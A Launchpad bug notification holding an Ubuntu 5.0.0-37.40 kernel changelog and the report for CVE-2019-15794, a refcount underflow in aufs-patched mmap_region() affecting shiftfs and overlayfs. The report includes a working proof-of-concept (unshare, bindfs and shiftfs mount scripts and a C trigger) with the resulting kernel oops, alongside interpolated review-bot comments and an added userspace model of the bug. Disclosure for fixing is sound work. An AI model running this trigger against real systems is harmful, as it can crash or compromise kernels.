This bug was fixed in the package linux - 5.0.0-37.40
---------------
linux (5.0.0-37.40) disco; urgency=medium
* disco/linux: 5.0.0-37.40 -proposed tracker (LP: #1852253)
* System hangs at early boot (LP: #1851216)
- x86/timer: Skip PIT initialization on modern chipsets
* drm/i915: Add support for another CMP-H PCH (LP: #1848491)
- drm/i915/cml: Add second PCH ID for CMP
* Some EFI systems fail to boot in efi_init() when booted via maas
(LP: #1851810)
- efi: efi_get_memory_map -- increase map headroom
* seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test (LP: #1849281)
- SAUCE: seccomp: avoid overflow in implicit constant conversion
- SAUCE: seccomp: rework define for SECCOMP_USER_NOTIF_FLAG_CONTINUE
- SAUCE: seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test
* dkms artifacts may expire from the pool (LP: #1850958)
- [Packaging] dkms -- try launchpad librarian for pool downloads
- [Packaging] dkms -- dkms-build quieten wget verbiage
* update ENA driver to version 2.1.0 (LP: #1850175)
- net: ena: fix swapped parameters when calling
ena_com_indirect_table_fill_entry
- net: ena: fix: Free napi resources when ena_up() fails
- net: ena: fix incorrect test of supported hash function
- net: ena: fix return value of ena_com_config_llq_info()
- net: ena: improve latency by disabling adaptive interrupt moderation by
default
- net: ena: fix ena_com_fill_hash_function() implementation
- net: ena: add handling of llq max tx burst size
- net: ena: ethtool: add extra properties retrieval via get_priv_flags
- net: ena: replace free_tx/rx_ids union with single free_ids field in
ena_ring
- net: ena: arrange ena_probe() function variables in reverse christmas tree
- net: ena: add newline at the end of pr_err prints
- net: ena: documentation: update ena.txt
- net: ena: allow automatic fallback to polling mode
- net: ena: add support for changing max_header_size in LLQ mode
- net: ena: optimise calculations for CQ doorbell
- net: ena: add good checksum counter
- net: ena: use dev_info_once instead of static variable
- net: ena: add MAX_QUEUES_EXT get feature admin command
- net: ena: enable negotiating larger Rx ring size
- net: ena: make ethtool show correct current and max queue sizes
- net: ena: allow queue allocation backoff when low on memory
- net: ena: add ethtool function for changing io queue sizes
- net: ena: remove inline keyword from functions in *.c
- net: ena: update driver version from 2.0.3 to 2.1.0
- net: ena: Fix bug where ring allocation backoff stopped too late
- Revert "net: ena: ethtool: add extra properties retrieval via
get_priv_flags"
- net: ena: don't wake up tx queue when down
- net: ena: clean up indentation issue
* Add Intel Comet Lake ethernet support (LP: #1848555)
- SAUCE: e1000e: Add support for Comet Lake
* Intel Wireless AC 3168 on Eoan complaints FW error in SYNC CMD
GEO_TX_POWER_LIMIT (LP: #1846016)
- iwlwifi: exclude GEO SAR support for 3168
* tsc marked unstable after entered PC10 on Intel CoffeeLake (LP: #1840239)
- SAUCE: x86/intel: Disable HPET on Intel Coffe Lake platforms
- SAUCE: x86/intel: Disable HPET on Intel Ice Lake platforms
* cloudimg: no iavf/i40evf module so no network available with SR-IOV enabled
cloud (LP: #1848481)
- [Packaging] include iavf/i40evf in generic
* High power consumption using 5.0.0-25-generic (LP: #1840835)
- PCI: Add a helper to check Power Resource Requirements _PR3 existence
- ALSA: hda: Allow HDA to be runtime suspended when dGPU is not bound to a
driver
- PCI: Fix missing inline for pci_pr3_present()
* CML CPUIDs (LP: #1843794)
- x86/cpu: Add Comet Lake to the Intel CPU models header
* shiftfs: prevent exceeding project quotas (LP: #1849483)
- SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective capabilities
* shiftfs: fix fallocate() (LP: #1849482)
- SAUCE: shiftfs: setup correct s_maxbytes limit
* Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message
(LP: #1850443)
- Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message
* [SRU][B/OEM-B/OEM-OSP1/D/E] UBUNTU: SAUCE: add rtl623 codec support and fix
mic issues (LP: #1850599)
- SAUCE: ALSA: hda/realtek - Add support for ALC623
- SAUCE: ALSA: hda/realtek - Fix 2 front mics of codec 0x623
* NFSv4.1: Interrupted connections cause high bandwidth RPC ping-pong between
client and server (LP: #1828978)
- NFSv4.1: Avoid false retries when RPC calls are interrupted
* SUNRPC: Use after free when GSSD credentials are invalid causes oops
(LP: #1842037)
- SUNRPC: Clean up
- SUNRPC: Fix a use after free when a server rejects the RPCSEC_GSS
credential
* Suppress "hid_field_extract() called with n (192) > 32!" message floods
(LP: #1850600)
- HID: core: reformat and reduce hid_printk macros
- HID: core: Add printk_once variants to hid_warn() etc
- HID: core: fix dmesg flooding if report field larger than 32bit
* ubuntu-aufs-modified mmap_region() breaks refcounting in overlayfs/shiftfs
error path (LP: #1850994) // CVE-2019-15794
- SAUCE: shiftfs: Restore vm_file value when lower fs mmap fails
- SAUCE: ovl: Restore vm_file value when lower fs mmap fails
* s_iflags overlap prevents unprivileged overlayfs mounts (LP: #1851677)
- SAUCE: fs: Move SB_I_NOSUID to the top of s_iflags
* root can lift kernel lockdown (LP: #1851380)
- SAUCE: (efi-lockdown) Really don't allow lifting lockdown from userspace
* Disco update: upstream stable patchset 2019-11-01 (LP: #1850974)
- panic: ensure preemption is disabled during panic()
- f2fs: use EINVAL for superblock with invalid magic
- [Config] updateconfigs for USB_RIO500
- USB: rio500: Remove Rio 500 kernel driver
- USB: yurex: Don't retry on unexpected errors
- USB: yurex: fix NULL-derefs on disconnect
- USB: usb-skeleton: fix runtime PM after driver unbind
- USB: usb-skeleton: fix NULL-deref on disconnect
- xhci: Fix false warning message about wrong bounce buffer write length
- xhci: Prevent device initiated U1/U2 link pm if exit latency is too long
- xhci: Check all endpoints for LPM timeout
- xhci: Fix USB 3.1 capability detection on early xHCI 1.1 spec based hosts
- usb: xhci: wait for CNR controller not ready bit in xhci resume
- xhci: Prevent deadlock when xhci adapter breaks during init
- USB: adutux: fix use-after-free on disconnect
- USB: adutux: fix NULL-derefs on disconnect
- USB: adutux: fix use-after-free on release
- USB: iowarrior: fix use-after-free on disconnect
- USB: iowarrior: fix use-after-free on release
- USB: iowarrior: fix use-after-free after driver unbind
- USB: usblp: fix runtime PM after driver unbind
- USB: chaoskey: fix use-after-free on release
- USB: ldusb: fix NULL-derefs on driver unbind
- serial: uartlite: fix exit path null pointer
- USB: serial: keyspan: fix NULL-derefs on open() and write()
- USB: serial: ftdi_sio: add device IDs for Sienna and Echelon PL-20
- USB: serial: option: add Telit FN980 compositions
- USB: serial: option: add support for Cinterion CLS8 devices
- USB: serial: fix runtime PM after driver unbind
- USB: usblcd: fix I/O after disconnect
- USB: microtek: fix info-leak at probe
- USB: dummy-hcd: fix power budget for SuperSpeed mode
- usb: renesas_usbhs: gadget: Do not discard queues in
usb_ep_set_{halt,wedge}()
- usb: renesas_usbhs: gadget: Fix usb_ep_set_{halt,wedge}() behavior
- USB: legousbtower: fix slab info leak at probe
- USB: legousbtower: fix deadlock on disconnect
- USB: legousbtower: fix potential NULL-deref on disconnect
- USB: legousbtower: fix open after failed reset request
- USB: legousbtower: fix use-after-free on release
- mei: me: add comet point (lake) LP device ids
- mei: avoid FW version request on Ibex Peak and earlier
- gpio: eic: sprd: Fix the incorrect EIC offset when toggling
- Staging: fbtft: fix memory leak in fbtft_framebuffer_alloc
- staging: vt6655: Fix memory leak in vt6655_probe
- iio: adc: hx711: fix bug in sampling of data
- iio: adc: ad799x: fix probe error handling
- iio: adc: axp288: Override TS pin bias current for some models
- iio: light: opt3001: fix mutex unlock race
- efivar/ssdt: Don't iterate over EFI vars if no SSDT override was specified
- perf llvm: Don't access out-of-scope array
- perf inject jit: Fix JIT_CODE_MOVE filename
- CIFS: Gracefully handle QueryInfo errors during open
- CIFS: Force revalidate inode when dentry is stale
- CIFS: Force reval dentry if LOOKUP_REVAL flag is set
- kernel/sysctl.c: do not override max_threads provided by userspace
- mm/vmpressure.c: fix a signedness bug in vmpressure_register_event()
- firmware: google: increment VPD key_len properly
- gpiolib: don't clear FLAG_IS_OUT when emulating open-drain/open-source
- iio: adc: stm32-adc: move registers definitions
- iio: adc: stm32-adc: fix a race when using several adcs with dma and irq
- cifs: use cifsInodeInfo->open_file_lock while iterating to avoid a panic
- btrfs: fix incorrect updating of log root tree
- btrfs: fix uninitialized ret in ref-verify
- NFS: Fix O_DIRECT accounting of number of bytes read/written
- MIPS: Disable Loongson MMI instructions for kernel build
- MIPS: elf_hwcap: Export userspace ASEs
- ACPI/PPTT: Add support for ACPI 6.3 thread flag
- arm64: topology: Use PPTT to determine if PE is a thread
- Fix the locking in dcache_readdir() and friends
- media: stkwebcam: fix runtime PM after driver unbind
- arm64/sve: Fix wrong free for task->thread.sve_state
- tracing/hwlat: Report total time spent in all NMIs during the sample
- tracing/hwlat: Don't ignore outer-loop duration when calculating
max_latency
- ftrace: Get a reference counter for the trace_array on filter files
- tracing: Get trace_array reference for available_tracers files
- hwmon: Fix HWMON_P_MIN_ALARM mask
- x86/asm: Fix MWAITX C-state hint value
- perf/hw_breakpoint: Fix arch_hw_breakpoint use-before-initialization
- serial: uartps: Fix uartps_major handling
- usb: typec: tcpm: usb: typec: tcpm: Fix a signedness bug in
tcpm_fw_get_caps()
- staging: bcm2835-audio: Fix draining behavior regression
- staging: rtl8188eu: fix HighestRate check in odm_ARFBRefresh_8188E()
- iio: accel: adxl372: Fix/remove limitation for FIFO samples
- iio: accel: adxl372: Fix push to buffers lost samples
- iio: accel: adxl372: Perform a reset at start up
- selinux: fix context string corruption in convert_context()
- mm/z3fold.c: claim page in the beginning of free
- mm/page_alloc.c: fix a crash in free_pages_prepare()
- gpio: fix getting nonexclusive gpiods from DT
- btrfs: fix balance convert to single on 32-bit host CPUs
- Btrfs: fix memory leak due to concurrent append writes with fiemap
- RDMA/vmw_pvrdma: Free SRQ only once
- drm/i915: Whitelist COMMON_SLICE_CHICKEN2
- mtd: rawnand: au1550nd: Fix au_read_buf16() prototype
* Suspend stopped working from 4.4.0-157 onwards (LP: #1844021) // Disco
update: upstream stable patchset 2019-11-01 (LP: #1850974)
- xhci: Increase STS_SAVE timeout in xhci_suspend()
* Disco update: upstream stable patchset 2019-10-31 (LP: #1850870)
- s390/process: avoid potential reading of freed stack
- KVM: s390: Test for bad access register and size at the start of
S390_MEM_OP
- s390/topology: avoid firing events before kobjs are created
- s390/cio: exclude subchannels with no parent from pseudo check
- KVM: PPC: Book3S HV: Fix race in re-enabling XIVE escalation interrupts
- KVM: PPC: Book3S HV: Check for MMU ready on piggybacked virtual cores
- KVM: PPC: Book3S HV: Don't lose pending doorbell request on migration on
P9
- KVM: X86: Fix userspace set invalid CR4
- nbd: fix max number of supported devs
- PM / devfreq: tegra: Fix kHz to Hz conversion
- ASoC: Define a set of DAPM pre/post-up events
- ASoC: sgtl5000: Improve VAG power and mute control
- powerpc/mce: Fix MCE handling for huge pages
- powerpc/mce: Schedule work from irq_work
- powerpc/powernv: Restrict OPAL symbol map to only be readable by root
- powerpc/powernv/ioda: Fix race in TCE level allocation
- powerpc/book3s64/mm: Don't do tlbie fixup for some hardware revisions
- can: mcp251x: mcp251x_hw_reset(): allow more time after a reset
- tools lib traceevent: Fix "robust" test of do_generate_dynamic_list_file
- crypto: qat - Silence smp_processor_id() warning
- crypto: skcipher - Unmap pages after an external error
- crypto: cavium/zip - Add missing single_release()
- crypto: caam - fix concurrency issue in givencrypt descriptor
- crypto: ccree - account for TEE not ready to report
- crypto: ccree - use the full crypt length value
- MIPS: Treat Loongson Extensions as ASEs
- power: supply: sbs-battery: use correct flags field
- power: supply: sbs-battery: only return health when battery present
- tracing: Make sure variable reference alias has correct var_ref_idx
- usercopy: Avoid HIGHMEM pfn warning
- timer: Read jiffies once when forwarding base clk
- PCI: vmd: Fix shadow offsets to reflect spec changes
- watchdog: imx2_wdt: fix min() calculation in imx2_wdt_set_timeout
- perf stat: Fix a segmentation fault when using repeat forever
- drm/omap: fix max fclk divider for omap36xx
- drm/msm/dsi: Fix return value check for clk_get_parent
- drm/nouveau/kms/nv50-: Don't create MSTMs for eDP connectors
- drm/i915/gvt: update vgpu workload head pointer correctly
- mmc: sdhci: improve ADMA error reporting
- mmc: sdhci-of-esdhc: set DMA snooping based on DMA coherence
- Revert "locking/pvqspinlock: Don't wait if vCPU is preempted"
- xen/xenbus: fix self-deadlock after killing user process
- ieee802154: atusb: fix use-after-free at disconnect
- s390/cio: avoid calling strlen on null pointer
- cfg80211: initialize on-stack chandefs
- ima: always return negative code for error
- ima: fix freeing ongoing ahash_request
- fs: nfs: Fix possible null-pointer dereferences in encode_attrs()
- 9p: Transport error uninitialized
- 9p: avoid attaching writeback_fid on mmap with type PRIVATE
- xen/pci: reserve MCFG areas earlier
- ceph: fix directories inode i_blkbits initialization
- ceph: reconnect connection if session hang in opening state
- watchdog: aspeed: Add support for AST2600
- netfilter: nf_tables: allow lookups in dynamic sets
- drm/amdgpu: Fix KFD-related kernel oops on Hawaii
- drm/amdgpu: Check for valid number of registers to read
- pNFS: Ensure we do clear the return-on-close layout stateid on fatal
errors
- pwm: stm32-lp: Add check in case requested period cannot be achieved
- x86/purgatory: Disable the stackleak GCC plugin for the purgatory
- ntb: point to right memory window index
- thermal: Fix use-after-free when unregistering thermal zone device
- thermal_hwmon: Sanitize thermal_zone type
- libnvdimm/region: Initialize bad block for volatile namespaces
- fuse: fix memleak in cuse_channel_open
- libnvdimm/nfit_test: Fix acpi_handle redefinition
- sched/membarrier: Call sync_core only before usermode for same mm
- sched/membarrier: Fix private expedited registration check
- sched/core: Fix migration to invalid CPU in __set_cpus_allowed_ptr()
- perf build: Add detection of java-11-openjdk-devel package
- kernel/elfcore.c: include proper prototypes
- perf unwind: Fix libunwind build failure on i386 systems
- nfp: flower: fix memory leak in nfp_flower_spawn_vnic_reprs
- drm/radeon: Bail earlier when radeon.cik_/si_support=0 is passed
- KVM: PPC: Book3S HV: XIVE: Free escalation interrupts before disabling the
VP
- KVM: nVMX: Fix consistency check on injected exception error code
- nbd: fix crash when the blksize is zero
- powerpc/pseries: Fix cpu_hotplug_lock acquisition in resize_hpt()
- powerpc/book3s64/radix: Rename CPU_FTR_P9_TLBIE_BUG feature flag
- tools lib traceevent: Do not free tep->cmdlines in add_new_comm() on
failure
- tick: broadcast-hrtimer: Fix a race in bc_set_next
- perf tools: Fix segfault in cpu_cache_level__read()
- perf stat: Reset previous counts on repeat with interval
- riscv: Avoid interrupts being erroneously enabled in handle_exception()
- arm64: Add sysfs vulnerability show for spectre-v1
- arm64: add sysfs vulnerability show for meltdown
- arm64: enable generic CPU vulnerabilites support
- arm64: Always enable ssb vulnerability detection
- arm64: Provide a command line to disable spectre_v2 mitigation
- arm64: Advertise mitigation of Spectre-v2, or lack thereof
- arm64: Always enable spectre-v2 vulnerability detection
- arm64: add sysfs vulnerability show for spectre-v2
- arm64: add sysfs vulnerability show for speculative store bypass
- arm64: ssbs: Don't treat CPUs with SSBS as unaffected by SSB
- arm64: Use firmware to detect CPUs that are not affected by Spectre-v2
- arm64/speculation: Support 'mitigations=' cmdline option
- vfs: Fix EOVERFLOW testing in put_compat_statfs64
- coresight: etm4x: Use explicit barriers on enable/disable
- staging: erofs: fix an error handling in erofs_readdir()
- staging: erofs: some compressed cluster should be submitted for corrupted
images
- staging: erofs: add two missing erofs_workgroup_put for corrupted images
- staging: erofs: detect potential multiref due to corrupted images
- cfg80211: add and use strongly typed element iteration macros
- cfg80211: Use const more consistently in for_each_element macros
- nl80211: validate beacon head
- KVM: s390: fix __insn32_query() inline assembly
- crypto: caam/qi - fix error handling in ERN handler
- PCI: vmd: Fix config addressing when using bus offsets
- drm/atomic: Reject FLIP_ASYNC unconditionally
- drm/atomic: Take the atomic toys away from X
- drm/i915: to make vgpu ppgtt notificaiton as atomic operation
- mac80211: keep BHs disabled while calling drv_tx_wake_queue()
- mmc: tegra: Implement ->set_dma_mask()
- mmc: sdhci: Let drivers define their DMA mask
- libnvdimm/altmap: Track namespace boundaries in altmap
- DTS: ARM: gta04: introduce legacy spi-cs-high to make display work again
- xprtrdma: Toggle XPRT_CONGESTED in xprtrdma's slot methods
- fuse: fix request limit
- ceph: fetch cap_gen under spinlock in ceph_add_cap
- perf probe: Fix to clear tev->nargs in clear_probe_trace_event()
- selftests/seccomp: fix build on older kernels
- iommu/amd: Fix downgrading default page-sizes in alloc_pte()
- bpf: Fix bpf_event_output re-entry issue
- i2c: qcom-geni: Disable DMA processing on the Lenovo Yoga C630
- mlxsw: spectrum_flower: Fail in case user specifies multiple mirror
actions
- nfp: abm: fix memory leak in nfp_abm_u32_knode_replace
- Btrfs: fix selftests failure due to uninitialized i_mode in test inodes
- libnvdimm: prevent nvdimm from requesting key when security is disabled
-- Connor Kuehl <[email protected]> Wed, 13 Nov 2019 11:35:47 -0800
** Changed in: linux (Ubuntu Disco)
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1850994
Title:
ubuntu-aufs-modified mmap_region() breaks refcounting in
overlayfs/shiftfs error path
Status in linux package in Ubuntu:
In Progress
Status in linux source package in Disco:
Fix Released
Status in linux source package in Eoan:
Fix Released
Status in linux source package in Focal:
In Progress
Bug description:
SRU Justification
Impact: overlayfs and shiftfs both replace vma->vm_file in their mmap handlers. On error the original value is not restored, and the reference is put for the file to which vm_file points. On upstream kernels this is not an issue, as no callers dereference vm_file after call_mmap() returns an error. However, the aufs patches change mmap_region() to replace the fput() using a local variable with vma_fput(), which will fput() vm_file, leading to a refcount underflow.

Fix: Restore the original vm_file value on error.

Test Case: See below.

Regression Potential: Minimal. As stated above, other callers of call_mmap() do not dereference vma->vm_file when it returns an error, and the one which does is fixed by these patches.

Notes: Supported kernels prior to disco are not affected as overlayfs did not support mmap until 4.19, and shiftfs was not present in Ubuntu kernels before disco. The issue is mitigated for overlayfs by another bug which is preventing unprivileged mounting; a patch for this issue will be sent separately.
---
Tested on 19.10.
Ubuntu's aufs kernel patch includes the following change (which I interestingly can't see in the AUFS code at https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):
==================================================================
+#define vma_fput(vma) vma_do_fput(vma, __func__, __LINE__)
[...]
@@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned
long addr,
return addr;
unmap_and_free_vma:
+ vma_fput(vma);
vma->vm_file = NULL;
- fput(file);
/* Undo any partial mapping done by a device driver. */
unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
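Review bot: at the `unmap_and_free_vma:` label, replacing `fput(file)` with `vma_fput(vma)` changes which reference is dropped: `file` is the pointer mmap_region() took its own reference on, while `vma->vm_file` is whatever the ->mmap handler left behind. If a stacking handler such as ovl_mmap() or shiftfs_mmap() replaced vma->vm_file before returning an error, this path puts the lower file a second time and never drops the reference on `file`. Either keep `fput(file)` on this error path, or require handlers to restore vma->vm_file before failing, which is what the SAUCE patches in this update do.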
[...]
+void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
+{
+ struct file *f = vma->vm_file, *pr = vma->vm_prfile;
+
+ prfile_trace(f, pr, func, line, __func__);
+ fput(f);
+ if (f && pr)
+ fput(pr);
+}
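Review bot: vma_do_fput() guards only the vm_prfile put with `if (f && pr)` but calls `fput(f)` unconditionally; since the caller sets `vma->vm_file = NULL` immediately after this call and the helper has a generic name, either document that vm_file must be non-NULL on entry or guard the first put the same way (`if (f) fput(f);`). The helper also has no way of knowing whether `f` is still the file mmap_region() referenced, which is the underlying problem on the error path.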
==================================================================
This means that in the case where call_mmap() returns an error to mmap_region(), fput() will be called on the current value of vma->vm_file instead of the saved file pointer. This matters if the ->mmap() handler replaces ->vm_file before returning an error code.

overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails, see ovl_mmap() and shiftfs_mmap().
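To make the reference accounting described above concrete, here is a small userspace model of the two code paths, added for this write-up; it is not part of the bug report, of aufs, or of any kernel code. The `struct file`, `get_file()`, `fput()`, `stacked_mmap()`, `mmap_region_aufs()` and `run_error_path()` names are stand-ins constructed for the example, and the lower ->mmap is modelled as always failing with -ENODEV (the FUSE direct_io + MAP_SHARED case from the report). The `restore_on_error` flag switches between the unfixed error path and the SRU's fix of restoring the original vm_file value before returning.

```c
#include <assert.h>
#include <stdio.h>

/* Userspace model of the refcount handling around call_mmap() in mmap_region().
 * Constructed for illustration; none of this is kernel code. */

/* Stand-in for struct file: only the reference count (f_count) matters here. */
struct file {
    const char *name;
    int refcount;
};

/* Stand-in for struct vm_area_struct: only vm_file matters here. */
struct vm_area_struct {
    struct file *vm_file;
};

static void get_file(struct file *f) { f->refcount++; }

/* Like the kernel's fput() but never frees anything, so an extra put shows up
 * as a count of 0 or below instead of as a use-after-free. */
static void fput(struct file *f) { f->refcount--; }

#define ENODEV 19

/* Model of ovl_mmap()/shiftfs_mmap(): swap vma->vm_file for the lower file,
 * call the lower ->mmap, and handle its failure. The lower ->mmap is modelled
 * as always failing with -ENODEV. */
static int stacked_mmap(struct file *upper, struct vm_area_struct *vma,
                        struct file *lower, int restore_on_error)
{
    int ret;

    vma->vm_file = lower;
    get_file(lower);
    ret = -ENODEV;                 /* call_mmap(vma->vm_file, vma) fails */
    if (ret) {
        fput(lower);               /* drop the reference taken for the new vm_file */
        if (restore_on_error)
            vma->vm_file = upper;  /* the fix: put the original vm_file back */
    } else {
        fput(upper);               /* success: the previous vm_file value is gone */
    }
    return ret;
}

/* Model of the aufs-modified mmap_region() error path, which puts
 * vma->vm_file (vma_fput()) instead of the saved `file` local. */
static int mmap_region_aufs(struct file *file, struct file *lower,
                            int restore_on_error)
{
    struct vm_area_struct vma;
    int err;

    vma.vm_file = file;
    get_file(file);                /* vma->vm_file = get_file(file) */
    err = stacked_mmap(file, &vma, lower, restore_on_error);
    if (err) {
        fput(vma.vm_file);         /* vma_fput(vma): whatever vm_file is now */
        vma.vm_file = NULL;
    }
    return err;
}

struct outcome {
    int upper_refs;  /* references left on the shiftfs/overlayfs file */
    int lower_refs;  /* references left on the lower (FUSE) file */
};

/* Run one failing mmap and report the resulting counts. Both files start with a
 * single reference: the upper file's is held by the open fd, the lower file's
 * by the upper file's private data. */
struct outcome run_error_path(int restore_on_error)
{
    struct file upper = { "upper (shiftfs) file", 1 };
    struct file lower = { "lower (FUSE) file", 1 };
    struct outcome o;
    int err = mmap_region_aufs(&upper, &lower, restore_on_error);

    assert(err == -ENODEV);
    o.upper_refs = upper.refcount;
    o.lower_refs = lower.refcount;
    return o;
}

int main(void)
{
    struct outcome bug = run_error_path(0);
    struct outcome fix = run_error_path(1);

    printf("unfixed: upper=%d lower=%d (upper leaks a ref, lower is over-put)\n",
           bug.upper_refs, bug.lower_refs);
    printf("fixed:   upper=%d lower=%d\n", fix.upper_refs, fix.lower_refs);
    return 0;
}
```

In the unfixed run the lower file ends at zero references while the upper file still points at it through its private data, which is exactly the state the second mmap() in the PoC below trips over; restoring vm_file before returning makes mmap_region()'s put land on the file it actually referenced.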
To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes fuse_file_mmap() to bail out with -ENODEV if MAP_SHARED is set.

I would have used overlayfs instead, but there is an unrelated bug that makes it impossible to mount overlayfs inside a user namespace: Commit 82c0860106f264 ("UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower and upper mounts") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE already has the same value. This causes mount_too_revealing() to bail out with a WARN_ONCE().

Note that this PoC requires the "bindfs" package and should be executed with "slub_debug" in the kernel commandline to get a clear crash.
==================================================================
Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0
user-Standard-PC-Q35-ICH9-2009 login: user
Password:
Last login: Fr Nov 1 23:45:36 CET 2019 on ttyS0
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 updates can be installed immediately.
0 of these updates are security updates.
user@user-Standard-PC-Q35-ICH9-2009:~$ ls
aufs-mmap Documents Music Public trace.dat
Desktop Downloads Pictures Templates Videos
user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic
root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug
quiet splash vt.handoff=7
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
#!/bin/bash
set -e
mount -t tmpfs none /tmp
mkdir -p /tmp/{lower,middle,upper}
touch /tmp/lower/foo
# mount some random FUSE filesystem with direct_io,
# doesn't really matter what it does as long as
# there's a file in it.
# (this is just to get some filesystem that can
# easily be convinced to throw errors from f_op->mmap)
bindfs -o direct_io /tmp/lower /tmp/middle
# use the FUSE filesystem to back shiftfs.
# overlayfs would also work if SB_I_NOSUID and
# SB_I_USERNS_VISIBLE weren't defined to the same
# value...
mount -t shiftfs -o mark /tmp/middle /tmp/upper
mount|grep shift
gcc -o trigger trigger.c -Wall
./trigger
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>

int main(void) {
  int foofd = open("/tmp/upper/foo", O_RDONLY);
  if (foofd == -1) err(1, "open foofd");
  /* first mapping: the lower FUSE ->mmap rejects MAP_SHARED with -ENODEV,
   * taking mmap_region() through its error path */
  void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
  if (badmap == MAP_FAILED) {
    perror("badmap");
  } else {
    errx(1, "badmap worked???");
  }
  sleep(1);
  /* second mapping: shiftfs_mmap() touches the lower file again */
  mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
  return 0;
}
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh
/tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
badmap: No such device
[ 72.101721] general protection fault: 0000 [#1] SMP PTI
[ 72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic #20-Ubuntu
[ 72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[ 72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
[ 72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
[ 72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
[ 72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
[ 72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
[ 72.189705] FS: 00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
[ 72.193073] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
[ 72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 72.202815] Call Trace:
[ 72.203712] mmap_region+0x417/0x670
[ 72.204868] do_mmap+0x3a8/0x580
[ 72.205939] vm_mmap_pgoff+0xcb/0x120
[ 72.207954] ksys_mmap_pgoff+0x1ca/0x2a0
[ 72.210078] __x64_sys_mmap+0x33/0x40
[ 72.211327] do_syscall_64+0x5a/0x130
[ 72.212538] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 72.214177] RIP: 0033:0x7faa3ecc7af6
[ 72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007faa3ecc7af6
[ 72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09: 0000000000000000
[ 72.233193] R10: 0000000000000001 R11: 0000000000000246 R12: 0000556248213100
[ 72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15: 0000000000000000
